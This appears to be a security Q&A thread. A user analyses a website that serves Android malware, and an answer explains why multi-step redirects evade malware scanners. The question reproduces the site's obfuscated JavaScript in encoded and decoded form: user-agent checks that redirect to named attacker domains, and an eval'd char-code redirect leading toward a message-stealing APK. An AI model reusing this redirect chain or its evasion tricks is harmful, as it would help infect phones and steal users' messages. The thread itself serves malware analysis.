1

Recently I find a new kind of malware site: it only attacks Android phones, it looks normal from PC. And it successfully avoided all malware-detector.

To see how it works, take a look at site: www.mfflag.com

In the beginning of the html, it has a script:

<script>
<!--
document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0Avar%20browser%20%3D%20%7B%0Aversions%3A%20function%20%28%29%20%7B%0Avar%20u%20%3D%20navigator.userAgent%2C%20app%20%3D%20navigator.appVersion%3B%0Areturn%20%7B%20//%u79FB%u52A8%u7EC8%u7AEF%u6D4F%u89C8%u5668%u7248%u672C%u4FE1%u606F%20%0Aios%3A%20%21%21u.match%28/%5C%28i%5B%5E%3B%5D+%3B%28%20U%3B%29%3F%20CPU.+Mac%20OS%20X/%29%2C%20//ios%u7EC8%u7AEF%20%0Aandroid%3A%20u.indexOf%28%27Android%27%29%20%3E%20-1%20%7C%7C%20u.indexOf%28%27Linux%27%29%20%3E%20-1%2C%20//android%u7EC8%u7AEF%u6216uc%u6D4F%u89C8%u5668%20%0AiPhone%3A%20u.indexOf%28%27iPhone%27%29%20%3E%20-1%2C%20//%u662F%u5426%u4E3AiPhone%u6216%u8005QQHD%u6D4F%u89C8%u5668%20%0AiPad%3A%20u.indexOf%28%27iPad%27%29%20%3E%20-1%2C%20//%u662F%u5426iPad%20%0A%7D%3B%0A%7D%28%29%2C%0A%7D%0Aif%20%28browser.versions.iPhone%20%7C%7C%20browser.versions.iPad%20%7C%7C%20browser.versions.ios%29%20%7B%0Awindow.location.href%20%3D%20%22http%3A//9ifmz.polishingmedia.cn%3A9000/668899.html%22%3B%0A%7D%0Aif%20%28browser.versions.android%29%20%7B%0Awindow.location.href%20%3D%20%22http%3A//zm87i.gaoxiaopic.cn%3A8301/668899.zip%22%3B%0A%7D%0A%3C/script%3E"));
//-->
</script>

It is URL-encoded, by after decode, it looks like:

<script type="text/javascript">
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return { //
ios: !!u.match(/\(i[^;] ;( U;)? CPU. Mac OS X/), //ios
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android
iPhone: u.indexOf('iPhone') > -1, //
iPad: u.indexOf('iPad') > -1, //iPad 
};
}(),
}
if (browser.versions.iPhone || browser.versions.iPad || browser.versions.ios) {
window.location.href = "http://9ifmz.polishingmedia.cn:9000/668899.html";
}
if (browser.versions.android) {
window.location.href = "http://zm87i.gaoxiaopic.cn:8301/668899.zip";
}
</script>

So basically the first jump is to download a zip for Android, and that .zip link is only accessible from some mobile browsers. After download and uncompress, it is also a javascript:

<html><head><title>loading</title><script>var d = [119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,39,104,116,116,112,58,47,47,100,115,97,101,119,113,46,110,118,114,101,110,97,105,46,99,99,58,56,51,51,48,47,54,54,56,56,57,57,95,99,51,100,52,54,57,48,50,51,48,56,54,97,49,55,55,56,100,56,55,50,98,101,52,49,97,99,54,52,50,51,57,46,104,116,109,108,39];  var u = '';  for(var i = 0; i < d.length; i++){          u += String.fromCharCode(d[i]);      };      eval(u);      </script></head></html>

This is yet another jump after decode from the var, and then at that place it tries to install a .apk file on the phone, and show some porn videos.

The apk is a virus and will read every your message and send to an email the attacker uses.

Question is why not jump directly? Why does such kind of attack uses multiple jumps to the final site?

And second, why does all malware detector fails to detect such threats? Is it because the script only targets mobile devices and detector doesn't use that agent tag?

bugs king
  • 566
  • 5
  • 13
  • top major security check sites such as google safe browsing, failed to detect such kind of obfuscated scripts and malware, so why? – bugs king Feb 23 '18 at 05:35

1 Answers1

0

Question is why not jump directly? Why does such kind of attack uses multiple jumps to the final site?

And second, why does all malware detector fails to detect such threats? Is it because the script only targets mobile devices and detector doesn't use that agent tag?

Using multiple redirects make manual analyze process boring, on the other hand malware detector and malicious activity detectors in most cases do not analyze theme because of multiple redirects make their server or local engine busy (they must follow redirects to arrive to final destination) .

Malware authors use some sleep functions or huge mathematics calculation(because some malware detectors algorithms detect simple sleep or wait functions and neutralize this tricks) to random gap between redirects and make redirects time-consuming process.

Must of malware detectors do not scan multiple redirects after (n) number of redirects occurred because the self guard algorithms and mechanisms think the time-consuming activity trying to make the engine busy or stop it by stack overflow and etc. Of course this trick is old but it still works!

This is unlimited game, malware authors use new tricks and get smarter daily on the other hand malware detectors learn this tricks and improve they algorithms and AI engines and try to prevent attacks.

Mojtaba Tajik
  • 1,725
  • 16
  • 34